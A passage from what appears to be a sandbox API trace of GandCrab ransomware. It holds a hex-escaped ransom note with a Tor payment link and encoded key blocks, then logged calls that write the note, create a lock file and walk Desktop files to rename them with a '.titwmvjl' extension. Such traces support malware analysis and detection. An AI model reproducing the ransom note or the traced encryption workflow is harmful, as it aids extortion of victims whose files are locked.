x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.318] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0096.319] CloseHandle (hObject=0x230) returned 1 [0096.319] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.319] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.319] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x275)) [0096.319] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.320] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.320] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.320] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Desktop\\d2ca4a09d2ca4deb61a.lock") returned 49 [0096.320] CreateFileW (lpFileName="C:\\Users\\Default\\Desktop\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\desktop\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0096.321] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.321] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.321] lstrlenW (lpString="C:\\Users\\Default\\Desktop\\") returned 25 [0096.321] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Desktop\\*") returned="C:\\Users\\Default\\Desktop\\*" [0096.321] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Desktop\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x5033f8 [0096.321] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.321] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.322] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.322] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.322] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.322] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.322] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.322] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Default\\Desktop\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Default\\Desktop\\d2ca4a09d2ca4deb61a.lock" [0096.322] lstrlenW (lpString=".titwmvjl") returned 9 [0096.322] lstrlenW (lpString="C:\\Users\\Default\\Desktop\\d2ca4a09d2ca4deb61a.lock") returned 49 [0096.322] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.322] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\Desktop\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 58 [0096.322] lstrlenW (lpString="C:\\Users\\Default\\Desktop\\d2ca4a09d2ca4deb61a.lock") returned 49 [0096.322] lstrlenW (lpString=".lock") returned 5 [0096.322] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.322] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.322] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.322] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.323] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.323] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.323] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.323] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\Desktop\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Default\\Desktop\\TITWMVJL-DECRYPT.txt" [0096.323] lstrlenW 